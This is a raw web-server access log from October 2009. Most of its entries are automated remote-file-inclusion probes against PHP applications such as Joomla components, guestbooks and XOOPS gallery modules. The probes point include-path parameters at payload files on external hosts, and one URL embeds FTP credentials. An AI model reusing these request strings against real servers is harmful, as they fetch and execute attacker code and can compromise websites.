85.17.234.36 - - [13/Oct/2009:04:47:12 -0400] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:12 -0400] "GET /logs/access_log.Q109062000%20%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:12 -0400] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:12 -0400] "GET /logs/access_log.Q109072300%20%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:47:18 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:04:47:46 -0400] "GET /logs/access_log.Q109090200//errors.php?error=http://djgono.nl/gallery/albums/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:51 -0400] "GET /logs/access_log.Q109062000/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:51 -0400] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:51 -0400] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:47:51 -0400] "GET /logs/access_log.Q109072300/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:47:59 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:48:20 -0400] "GET /logs/access_log.Q109061100//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:04:48:22 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
174.143.3.188 - - [13/Oct/2009:04:48:22 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.61 [en] (OS/2; U)"
174.143.3.188 - - [13/Oct/2009:04:48:22 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
174.143.3.188 - - [13/Oct/2009:04:48:22 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
206.225.23.4 - - [13/Oct/2009:04:48:23 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://lighttown.net//id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [13/Oct/2009:04:48:23 -0400] "GET /e404.php?DOCUMENT_ROOT=http://lighttown.net//id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
206.225.23.4 - - [13/Oct/2009:04:48:23 -0400] "GET /logs/error_log.Q109071800%20%20/e404.php?DOCUMENT_ROOT=http://lighttown.net//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
206.225.23.4 - - [13/Oct/2009:04:48:23 -0400] "GET /logs/error_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://lighttown.net//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:48:32 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
206.225.23.4 - - [13/Oct/2009:04:48:34 -0400] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://lighttown.net//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:04:48:56 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.225.23.4 - - [13/Oct/2009:04:49:02 -0400] "GET /logs/error_log.Q109090900%20%20/e404.php?DOCUMENT_ROOT=http://lighttown.net//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:04:49:02 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.225.23.4 - - [13/Oct/2009:04:49:35 -0400] "GET /logs/error_log.Q109071800/e404.php?DOCUMENT_ROOT=http://lighttown.net//id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
206.225.23.4 - - [13/Oct/2009:04:49:35 -0400] "GET /logs/error_log.Q109072900/e404.php?DOCUMENT_ROOT=http://lighttown.net//id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:04:49:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.234.36 - - [13/Oct/2009:04:49:43 -0400] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:49:43 -0400] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:49:43 -0400] "GET /logs/access_log.Q109062000/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:49:43 -0400] "GET /logs/access_log.Q109072300/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
80.249.173.242 - - [13/Oct/2009:04:50:14 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.seqent.com/customercarecenter/.source/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.171.190.107 - - [13/Oct/2009:04:50:27 -0400] "GET /logs/access_log.Q109051800//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:50:58 -0400] "GET /logs/access_log.Q109072300%20%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.17.234.36 - - [13/Oct/2009:04:50:58 -0400] "GET /logs/access_log.Q109062000%20%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:04:54:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.64.224.47 - - [13/Oct/2009:04:56:33 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
79.64.224.47 - - [13/Oct/2009:04:56:35 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
79.64.224.47 - - [13/Oct/2009:04:56:36 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
79.64.224.47 - - [13/Oct/2009:04:59:23 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:04:59:23 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Advanced Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [13/Oct/2009:04:59:23 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
174.143.3.188 - - [13/Oct/2009:04:59:24 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
174.143.3.188 - - [13/Oct/2009:04:59:24 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.59.12.99 - - [13/Oct/2009:04:59:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.142.90.79 - - [13/Oct/2009:05:00:35 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:00:35 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:00:35 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:00:36 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:00:36 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:00:36 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:00:36 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:00:36 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:00:37 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:00:37 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:00:37 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:00:37 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:00:37 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:00:37 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:00:42 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:00:42 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
168.143.19.89 - - [13/Oct/2009:05:01:17 -0400] "GET /logs/access_log.Q109090100//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.825"
168.143.19.89 - - [13/Oct/2009:05:01:17 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.825"
168.143.19.89 - - [13/Oct/2009:05:01:17 -0400] "GET //components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.825"
168.143.19.89 - - [13/Oct/2009:05:01:23 -0400] "GET /logs/access_log.Q109072200//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.825"
206.108.7.161 - - [13/Oct/2009:05:01:54 -0400] "GET /logs/access_log.Q109090100//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
206.108.7.161 - - [13/Oct/2009:05:01:54 -0400] "GET //components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
206.108.7.161 - - [13/Oct/2009:05:01:54 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
174.142.90.79 - - [13/Oct/2009:05:01:59 -0400] "GET /logs/access_log.Q109052500//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:01:59 -0400] "GET /logs/access_log.Q109080500//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:01:59 -0400] "GET /logs/access_log.Q109080500//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.142.90.79 - - [13/Oct/2009:05:02:00 -0400] "GET /logs/access_log.Q109052500//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ezymart.com.au//images/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.108.7.161 - - [13/Oct/2009:05:02:01 -0400] "GET /logs/access_log.Q109072200//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
211.40.68.132 - - [13/Oct/2009:05:03:20 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:03:20 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:03:22 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:03:24 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
165.141.177.14 - - [13/Oct/2009:05:03:24 -0400] "GET //?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
165.141.177.14 - - [13/Oct/2009:05:03:24 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:03:24 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:03:24 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
165.141.177.14 - - [13/Oct/2009:05:03:24 -0400] "GET /logs//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:03:25 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:03:25 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:03:25 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:03:27 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:03:27 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:03:27 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
165.141.177.14 - - [13/Oct/2009:05:03:36 -0400] "GET /logs//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:03:42 -0400] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:03:43 -0400] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:03:43 -0400] "GET /logs/access_log.Q109090900%20%20/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:03:47 -0400] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:03:47 -0400] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:03:48 -0400] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:03:51 -0400] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.122.160 - - [13/Oct/2009:05:03:51 -0400] "GET /logs/access_log.Q109090900%20%20/e404.php?DOCUMENT_ROOT=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:04:17 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:04:17 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:04:17 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:06:08 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:06:08 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:06:08 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:05:06:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
165.141.177.14 - - [13/Oct/2009:05:07:09 -0400] "GET /logs/access_log.Q109070200//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
165.141.177.14 - - [13/Oct/2009:05:07:22 -0400] "GET /logs/access_log.Q109070200//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.152.96.125 - - [13/Oct/2009:05:07:33 -0400] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 236 "-" "-"
61.152.96.125 - - [13/Oct/2009:05:07:33 -0400] "GET /adxmlrpc.php HTTP/1.0" 404 210 "-" "-"
165.141.177.14 - - [13/Oct/2009:05:07:34 -0400] "GET /logs/access_log.Q109070200//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
165.141.177.14 - - [13/Oct/2009:05:07:34 -0400] "GET /logs/access_log.Q109070200//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.152.96.125 - - [13/Oct/2009:05:07:34 -0400] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 219 "-" "-"
61.152.96.125 - - [13/Oct/2009:05:07:34 -0400] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 220 "-" "-"
61.152.96.125 - - [13/Oct/2009:05:07:35 -0400] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 220 "-" "-"
61.152.96.125 - - [13/Oct/2009:05:07:35 -0400] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 217 "-" "-"
61.152.96.125 - - [13/Oct/2009:05:07:36 -0400] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 214 "-" "-"
61.152.96.125 - - [13/Oct/2009:05:07:37 -0400] "GET /ads/adxmlrpc.php HTTP/1.0" 404 214 "-" "-"
61.152.96.125 - - [13/Oct/2009:05:07:37 -0400] "GET /xmlrpc.php HTTP/1.0" 404 208 "-" "-"
165.141.177.14 - - [13/Oct/2009:05:07:46 -0400] "GET /logs/access_log.Q109070200//?_zb_path=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:05:09:44 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.143.3.188 - - [13/Oct/2009:05:09:44 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
211.172.225.50 - - [13/Oct/2009:05:09:52 -0400] "GET /logs/access_log.Q109080400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
